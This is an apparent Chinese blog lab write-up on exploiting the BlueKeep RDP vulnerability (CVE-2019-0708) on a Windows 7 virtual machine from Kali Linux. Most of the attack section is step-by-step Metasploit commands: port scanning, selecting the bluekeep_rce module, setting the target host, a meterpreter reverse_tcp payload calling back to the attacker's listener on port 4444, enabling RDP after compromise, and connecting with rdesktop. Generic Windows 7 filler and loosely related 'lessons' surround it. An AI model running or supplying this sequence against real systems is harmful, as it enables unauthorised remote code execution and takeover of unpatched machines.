本文介绍了如何在KaliLinux环境中利用Windows7的CVE_2019_0708漏洞进行远程桌面(RDP)攻击,包括开启端口、设置目标、使用exploit工具和防御心得。
目录
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
简介
Windows 7是由微软公司推出的操作系统,它在Windows Vista的基础上进行了许多改进,使其更加快速、稳定、易用。
Windows 7的特点:
-
更好的性能:Windows 7在处理速度、启动速度等方面优于Windows Vista和Windows XP。
-
更好的用户体验:Windows 7集成了诸如任务栏预览、Jump Lists、窗口托放等功能,大大提升了用户体验。
-
更好的稳定性:Windows 7在应用程序崩溃、蓝屏等方面表现更加出色,可以有效避免系统崩溃的情况。
-
更好的兼容性:Windows 7兼容性极佳,可以运行几乎所有的软件和硬件,即使是较老的设备和程序也能在Windows 7上使用。
-
更好的网络功能:Windows 7在网络功能、文件共享等方面也进行了优化,支持多种网络连接方式,操作更加简单。
总之,Windows 7是一款功能强大、易用、稳定、兼容性高的操作系统,为用户提供了更好的使用体验。
目的
-
提供一个用户友好的桌面环境,使得用户可以轻松地完成日常的计算机操作。
-
支持安装和运行各种应用程序,包括办公软件、游戏、多媒体工具等。
-
提供互联网连接功能,包括浏览网页、发送电子邮件、下载文件等。
-
提供数据存储和备份功能,使得用户可以安全地存储数据并创建备份。
-
提供网络和数据安全保护功能,包括用户账户管理、防病毒软件等。
-
提供远程协作和共享功能,使得用户可以与远程团队进行协作和文件共享。
实验内容
开启Kali虚拟机和win7靶机
在win7虚拟机的命令窗口输入:netstat -an,查看打开的端口:
打开3389端口
若3389没打开,可以右键计算机,选择属性
查看打开的端口
输入netstat -an 查看打开的端口
利用windows 7 漏洞
利用windows 7 cve-2019-0708漏洞案例
kali中使用nmap扫描目标机器端口确认是否开启3389端口
确认开启后启动
输入:msfconsole
搜索漏洞
search 0708
使用攻击功能:
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
设置目标
set rhost 被攻击ip #设置win7ip
set rport 3389
设置payload
set payload windows/x64/meterpreter/reverse_tcp #设置64位的payload如果是32位机器则不用加x64
设置攻击机
set lhost 攻击者ip #设置kali的ip
set lport 4444 #设置攻击者的监听端口(端口可以随意更改)
显示选择靶机架构
输入:show targets,显示可以选择的靶机的架构
尝试攻击
用于vm15.5.1
选择target 3,进行尝试:set target 3
进行攻击,运行:run
建立连接
输入:run post/windows/manage/enable_rdp 运行远程桌面模块
另开一个kali终端输入:rdesktop 192.168.107.140(windows的ip)
心得体会
- 及时更新系统:保持系统更新可以让您的系统更加安全,并填补一些已知漏洞。
- 安装必要的驱动程序:及时安装必要的驱动程序可以确保您的硬件设备工作正常。
- 安装必要的安全软件:安装必要的安全软件,如杀毒软件和防火墙,可以大大提高系统的安全性。
- 清理垃圾文件:定期清理垃圾文件可以释放磁盘空间,并提高系统的性能。
- 使用系统还原功能:使用系统还原功能可以恢复系统到之前的状态,以应对系统出现的问题。
- 学习一些快捷键:学习一些快捷键可以更快速地完成某些操作,提高工作效率。
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
